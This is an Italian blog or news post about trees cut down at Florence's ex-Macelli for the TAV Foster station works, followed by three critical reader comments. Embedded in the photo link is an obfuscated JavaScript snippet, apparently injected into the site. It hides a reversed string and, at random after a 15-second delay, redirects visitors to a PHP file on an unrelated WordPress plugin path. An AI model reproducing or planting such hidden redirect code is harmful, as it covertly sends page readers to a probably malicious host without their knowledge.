Tav, iniziano i lavori e ci sono i primi danni. Giù gli alberi ai Macelli

image_pdfimage_print

Succede nell’area degli ex-Macelli, dove hanno iniziato con i lavori propedeutici alla realizzazione della stazione Foster dell’Alta velocità. Ecco una foto di oggi, di Elena Romoli della lista perUnaltracittà

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/01/alberi-macelli.jpg”>alberi macelli

0 Comments

  1. Gianni Barba

    Ai dittadini democratici, indipendenti e liberi da condizionamenti partitici di ogni tipo e che ancora hanno del sale nella zucca e non riescono a chiudere gli occhi di fronte ad un altro “misfatto annunciato” è richiesto di impegnarsi ancora di più e protestare pacificamente contro l’ ALTA VORACITA’ ,lo sperpero di denaro pubblico,l’arroganza e la faccia tosta di personaggi che non riescono nemmeno ad un giorno dall’inaugurazione a far funzionare la TAV che collega Firenze e Bologna .
    Forsa popolo viola…. ripartenza…a piedi perchè di Moretti e certi amministratori poltronati megli non fidarsi,
    NO DAY AL “MACELLO ” DI FIRENZE

    Reply
  2. Luca Grillandini

    Stazione Foster….la gente nn la vuole e loro la fanno….bella democrazia e rispetto dei cittadini….

    Reply
  3. fabrizio bastianoni

    La Democrazia,caro Luca,è definitivamente morta ammazzata nelle stanze dei tetri e tristi Palazzi del Potere di ogni fazione al comando. Qualsiasi protesta lecita e sacrosanta diventa un problema di ordine pubblico da sedare a suon di manganellate da parte degli sbirri,come stà di nuovo succedendo in Valdisusa ,in questi giorni. E “il popolo” se ne frega o dorme,e sappiamo bene che il sonno,specie quello della coscienza,genera mostri. Che tristezza.

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *